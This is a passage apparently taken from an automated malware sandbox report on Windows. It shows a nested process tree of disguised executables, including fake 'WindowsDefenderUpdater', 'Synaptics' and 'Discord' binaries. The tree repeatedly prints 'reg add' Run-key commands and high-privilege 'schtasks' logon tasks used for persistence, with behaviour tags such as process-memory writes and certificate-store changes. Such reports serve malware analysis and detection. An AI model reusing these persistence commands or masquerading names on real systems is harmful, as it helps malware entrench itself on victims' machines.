        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        158⤵
        
        PID:4196
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        157⤵
        
        PID:4008
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        157⤵
        
        PID:4152
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8D.tmp\8E.tmp\8F.bat C:\Windows\system32\java.exe"
        158⤵
        Drops file in System32 directory
        
        PID:1880
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        159⤵
        
        PID:4820
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        159⤵
        
        PID:4488
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        159⤵
        
        PID:3104
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        159⤵
        
        PID:3636
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        159⤵
        
        PID:4652
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        159⤵
        
        PID:4508
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        160⤵
        
        PID:2608
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        159⤵
        
        PID:4528
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        159⤵
        
        PID:4124
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\464.tmp\465.tmp\466.bat C:\Windows\system32\java.exe"
        160⤵
        
        PID:3028
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        161⤵
        
        PID:1504
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        161⤵
        
        PID:4276
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        161⤵
        
        PID:4216
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        161⤵
        
        PID:3288
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        161⤵
        
        PID:4436
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        161⤵
        
        PID:3980
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        162⤵
        
        PID:4120
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        161⤵
        
        PID:5064
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        161⤵
        
        PID:3360
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\889.tmp\88A.tmp\88B.bat C:\Windows\system32\java.exe"
        162⤵
        Drops file in System32 directory
        
        PID:4492
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        163⤵
        Delays execution with timeout.exe
        
        PID:4944
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        163⤵
        
        PID:4172
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        163⤵
        
        PID:4496
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        163⤵
        
        PID:2052
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        163⤵
        
        PID:2556
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        163⤵
        
        PID:3064
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        164⤵
        
        PID:4216
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        163⤵
        
        PID:4424
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        163⤵
        
        PID:4920
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C50.tmp\C51.tmp\C52.bat C:\Windows\system32\java.exe"
        164⤵
        
        PID:3576
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        165⤵
        
        PID:4204
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        165⤵
        
        PID:4700
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        165⤵
        
        PID:4712
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        165⤵
        
        PID:4488
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        165⤵
        
        PID:4644
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        165⤵
        
        PID:4212
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        166⤵
        
        PID:4564
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        165⤵
        
        PID:4828
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        165⤵
        
        PID:1624
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1027.tmp\1028.tmp\1029.bat C:\Windows\system32\java.exe"
        166⤵
        
        PID:3440
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        167⤵
        Delays execution with timeout.exe
        
        PID:3280
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        167⤵
        
        PID:4824
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        167⤵
        
        PID:4664
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        167⤵
        Adds Run key to start application
        
        PID:4760
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        167⤵
        
        PID:5048
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        167⤵
        
        PID:1700
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        168⤵
        
        PID:3092
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        167⤵
        
        PID:4792
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        167⤵
        
        PID:4984
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\144C.tmp\144D.tmp\144E.bat C:\Windows\system32\java.exe"
        168⤵
        Drops file in System32 directory
        
        PID:4328
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        169⤵
        Delays execution with timeout.exe
        
        PID:4948
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        169⤵
        Adds Run key to start application
        
        PID:4032
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        169⤵
        
        PID:5052
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        169⤵
        
        PID:4480
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        169⤵
        Adds Run key to start application
        
        PID:4928
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        169⤵
        
        PID:4964
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        170⤵
        
        PID:4256
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        169⤵
        
        PID:3284
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        169⤵
        
        PID:4296
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\17F4.tmp\17F5.tmp\17F6.bat C:\Windows\system32\java.exe"
        170⤵
        Drops file in System32 directory
        
        PID:2132
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        171⤵
        
        PID:2192
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        171⤵
        
        PID:4804
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        171⤵
        
        PID:4448
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        171⤵
        
        PID:4844
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        171⤵
        
        PID:4560
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        171⤵
        
        PID:4428
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        172⤵
        
        PID:4460
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        171⤵
        
        PID:4728
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        171⤵
        
        PID:4392
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1C09.tmp\1C0A.tmp\1C0B.bat C:\Windows\system32\java.exe"
        172⤵
        Drops file in System32 directory
        
        PID:1464
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        173⤵
        
        PID:3760
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        171⤵
        
        PID:4360
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        169⤵
        
        PID:3104
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        167⤵
        
        PID:3148
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        165⤵
        
        PID:3616
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        163⤵
        
        PID:3752
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        161⤵
        
        PID:3416
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        159⤵
        
        PID:4512
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        157⤵
        Delays execution with timeout.exe
        
        PID:1980
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        155⤵
        
        PID:3604
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        153⤵
        
        PID:4360
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        151⤵
        Delays execution with timeout.exe
        
        PID:4752
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        149⤵
        
        PID:4368
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        147⤵
        
        PID:4248
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        145⤵
        
        PID:4652
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        143⤵
        
        PID:4132
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        141⤵
        Delays execution with timeout.exe
        
        PID:4880
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        139⤵
        Delays execution with timeout.exe
        
        PID:2952
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        137⤵
        Delays execution with timeout.exe
        
        PID:3668
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        135⤵
        
        PID:4332
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        133⤵
        
        PID:4932
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        131⤵
        
        PID:4368
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        129⤵
        Delays execution with timeout.exe
        
        PID:2724
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        127⤵
        Delays execution with timeout.exe
        
        PID:3228
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        125⤵
        Delays execution with timeout.exe
        
        PID:3920
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        123⤵
        
        PID:1708
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        121⤵
        Delays execution with timeout.exe
        
        PID:3244
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        119⤵
        
        PID:3428
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        117⤵
        
        PID:3328
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        115⤵
        
        PID:3180
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        113⤵
        
        PID:3280
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        111⤵
        Delays execution with timeout.exe
        
        PID:3088
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        109⤵
        
        PID:3644
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        107⤵
        Delays execution with timeout.exe
        
        PID:2576
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        105⤵
        
        PID:3348
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        103⤵
        
        PID:3932
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        101⤵
        Delays execution with timeout.exe
        
        PID:3540
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        99⤵
        Delays execution with timeout.exe
        
        PID:2056
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        97⤵
        Delays execution with timeout.exe
        
        PID:4028
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        95⤵
        Delays execution with timeout.exe
        
        PID:2952
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        93⤵
        
        PID:3820
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        91⤵
        
        PID:3596
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        89⤵
        
        PID:2260
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        87⤵
        
        PID:1572
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        85⤵
        Delays execution with timeout.exe
        
        PID:3508
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        83⤵
        
        PID:3900
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        81⤵
        
        PID:3704
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        79⤵
        Delays execution with timeout.exe
        
        PID:3160
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        77⤵
        
        PID:3880
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        75⤵
        Delays execution with timeout.exe
        
        PID:2028
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        73⤵
        Delays execution with timeout.exe
        
        PID:4064
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        71⤵
        
        PID:3244
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        69⤵
        
        PID:1188
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        67⤵
        
        PID:3184
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        65⤵
        
        PID:3932
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        63⤵
        
        PID:3496
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        61⤵
        
        PID:1856
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        59⤵
        
        PID:3792
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        57⤵
        
        PID:3376
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        55⤵
        Delays execution with timeout.exe
        
        PID:444
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        53⤵
        Delays execution with timeout.exe
        
        PID:2676
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        51⤵
        
        PID:2432
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        49⤵
        Delays execution with timeout.exe
        
        PID:2516
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        47⤵
        Delays execution with timeout.exe
        
        PID:2864
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        45⤵
        
        PID:1680
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        43⤵
        
        PID:2688
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        41⤵
        
        PID:2260
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        39⤵
        
        PID:2296
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        37⤵
        Delays execution with timeout.exe
        
        PID:1444
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        35⤵
        Delays execution with timeout.exe
        
        PID:348
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        33⤵
        
        PID:1188
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        31⤵
        Delays execution with timeout.exe
        
        PID:2792
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        29⤵
        
        PID:1976
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        27⤵
        
        PID:1516
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        25⤵
        Delays execution with timeout.exe
        
        PID:2492
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        23⤵
        
        PID:2748
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        21⤵
        
        PID:528
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        19⤵
        Delays execution with timeout.exe
        
        PID:2516
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        17⤵
        
        PID:2168
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        15⤵
        Delays execution with timeout.exe
        
        PID:1012
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        13⤵
        Delays execution with timeout.exe
        
        PID:2804
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        11⤵
        
        PID:2560
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        9⤵
        
        PID:2044
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        7⤵
        
        PID:1440
    - - C:\Windows\system32\timeout.exe
        
        timeout 5
        5⤵
        
        PID:3036
- - C:\Users\Admin\AppData\Local\Temp\Files\Utility2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Utility2.exe"
    3⤵
    PID:1948
- - C:\Users\Admin\AppData\Local\Temp\Files\Bugs.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Bugs.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4808
- - C:\Users\Admin\AppData\Local\Temp\Files\whats-new.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\whats-new.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4276
- C:\ProgramData\Synaptics\Synaptics.exe
  "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2656
- - C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2596
  - - C:\Users\Admin\AppData\Local\Temp\Files\Discord2.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Discord2.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2908
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2972
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2232
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1AF0.tmp.bat""
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2196
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1896
      - C:\Users\Admin\AppData\Roaming\Discord.exe
        
        "C:\Users\Admin\AppData\Roaming\Discord.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2404
  - - C:\Users\Admin\AppData\Local\Temp\Files\skibidi.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\skibidi.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1908
    - - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:264
    - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2792
      - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2696
      - C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\kFPWCgcpTawB.bat" "
        6⤵
        
        PID:2808
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:2740
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2608
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2376
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1608
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\lAeCUqTc55OW.bat" "
        8⤵
        
        PID:2068
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:988
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2328
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1464
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2484
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\q3ung8IgUjuI.bat" "
        10⤵
        
        PID:1980
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:1512
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1360
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2036
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2108
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\qrOL3CNScWvW.bat" "
        12⤵
        
        PID:2000
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:1680
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1616
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        13⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1472
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2364
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Tc9VPGO7zAtb.bat" "
        14⤵
        
        PID:2196
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:760
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1724
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
